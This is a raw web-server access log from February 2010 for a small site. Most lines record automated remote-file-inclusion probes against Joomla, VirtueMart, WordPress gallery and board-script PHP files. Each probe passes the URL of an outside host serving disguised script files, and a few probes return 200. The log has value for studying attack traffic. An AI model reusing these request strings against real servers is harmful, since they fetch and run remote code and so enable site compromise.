78.110.50.121 - - [11/Feb/2010:08:53:02 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:53:04 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:53:04 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:53:04 -0800] "GET /logs/access_100105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:53:17 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:53:17 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:53:17 -0800] "GET /logs/access_100105.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:08:54:49 -0800] "GET /login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:08:54:49 -0800] "GET /logs/access_100201.log//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:08:54:49 -0800] "GET /logs//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:54:50 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:54:50 -0800] "GET /logs/access_100105.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:54:50 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:08:55:29 -0800] "GET /logs/access_100112.log//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:08:55:49 -0800] "GET /login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:08:55:49 -0800] "GET /logs//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:08:55:49 -0800] "GET /logs/access_100201.log//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:08:55:56 -0800] "GET /logs/access_100115.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:08:56:21 -0800] "GET /logs/access_100112.log//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:56:59 -0800] "GET /logs/access_100131.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:57:25 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:57:25 -0800] "GET /logs/access_100104.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:57:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:08:57:53 -0800] "GET /logs/access_100201.log%20%20//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:58:01 -0800] "GET //wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:58:01 -0800] "GET /logs/access_100128.log%20%20///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:58:01 -0800] "GET /logs///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:08:58:08 -0800] "GET /logs/access_100112.log%20%20//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:58:19 -0800] "GET //wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:58:19 -0800] "GET /logs///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:58:19 -0800] "GET /logs/access_100128.log%20%20///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:08:58:46 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:58:50 -0800] "GET /orange_g/forum/viewtopic.php?p=26523 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:58:52 -0800] "GET /orange_g/forum/viewtopic.php?p=27505 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:58:54 -0800] "GET /orange_g/forum/viewtopic.php?p=25534 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:58:56 -0800] "GET /orange_g/forum/viewtopic.php?p=25328 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:58:57 -0800] "GET /orange_g/forum/viewtopic.php?p=27472 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:58:58 -0800] "GET /orange_g/forum/viewtopic.php?p=25236 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:59:00 -0800] "GET /orange_g/forum/viewtopic.php?p=29597 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:59:01 -0800] "GET /orange_g/forum/viewtopic.php?p=25224 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:59:02 -0800] "GET /orange_g/forum/viewtopic.php?p=26123 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:59:04 -0800] "GET /orange_g/forum/viewtopic.php?p=27591 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
203.124.149.168 - - [11/Feb/2010:08:59:05 -0800] "GET /logs/access_100111.log//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [11/Feb/2010:08:59:05 -0800] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [11/Feb/2010:08:59:05 -0800] "GET /write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:59:10 -0800] "GET /logs/access_100114.log%20%20///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [11/Feb/2010:08:59:14 -0800] "GET /logs/access_100112.log//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:08:59:18 -0800] "GET /logs/access_100114.log%20%20///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:59:25 -0800] "GET /logs/access_100201.log//login.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:59:25 -0800] "GET /login.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:59:25 -0800] "GET /logs//login.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:09:00:17 -0800] "GET /logs/access_100201.log%20%20//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:09:00:28 -0800] "GET /logs/access_100112.log%20%20//login.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:02:44 -0800] "GET /logs/access_100130.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:02:44 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:04 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:09:03:08 -0800] "GET /logs/access_100114.log///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:09:03:09 -0800] "GET /logs/access_100117.log///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:11 -0800] "GET /logs/access_100108.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:16 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:16 -0800] "GET /logs/access_100130.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:17 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:09:03:24 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:09:03:24 -0800] "GET /logs/access_100130.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:09:03:25 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:09:03:27 -0800] "GET /logs/access_100112.log//login.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:46 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:46 -0800] "GET /shop/main.php?_shop_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:46 -0800] "GET /logs//shop/main.php?_shop_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:46 -0800] "GET /logs/access_100118.log%20%20//shop/main.php?_shop_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:09:03:52 -0800] "GET /logs/access_100121.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:09:04:10 -0800] "GET /logs/access_100118.log%20%20//shop/main.php?_shop_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:09:04:10 -0800] "GET /shop/main.php?_shop_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:09:04:10 -0800] "GET /logs//shop/main.php?_shop_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:09:04:59 -0800] "GET /logs/access_100114.log///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:09:05:00 -0800] "GET /logs/access_100117.log///wp-content/plugins//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:09:05:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:09:05:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/ahhe.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:06:36 -0800] "GET /logs/access_100130.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:06:36 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:06:36 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:09:06:44 -0800] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:09:06:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:09:06:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:07:03 -0800] "GET /logs/access_100130.log//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:07:03 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:07:04 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:09:07:15 -0800] "GET /shop/main.php?_shop_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:09:07:15 -0800] "GET /logs//shop/main.php?_shop_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:09:07:15 -0800] "GET /logs/access_100118.log%20%20//shop/main.php?_shop_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [11/Feb/2010:09:07:31 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [11/Feb/2010:09:07:31 -0800] "GET /logs/access_100112.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [11/Feb/2010:09:07:31 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:07:39 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:07:39 -0800] "GET /logs/access_100130.log//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:07:39 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:07:42 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:07:42 -0800] "GET /logs/access_100130.log//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:07:42 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:09:08:03 -0800] "GET /logs/access_100128.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:08:12 -0800] "GET /logs/access_100130.log//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:08:12 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:09:08:13 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:08:18 -0800] "GET /logs/access_100121.log//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:08:22 -0800] "GET /logs/access_100121.log//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [11/Feb/2010:09:08:31 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [11/Feb/2010:09:08:31 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [11/Feb/2010:09:08:31 -0800] "GET /logs/access_100112.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:08:43 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [11/Feb/2010:09:08:43 -0800] "GET /logs/access_100130.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_lmo&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
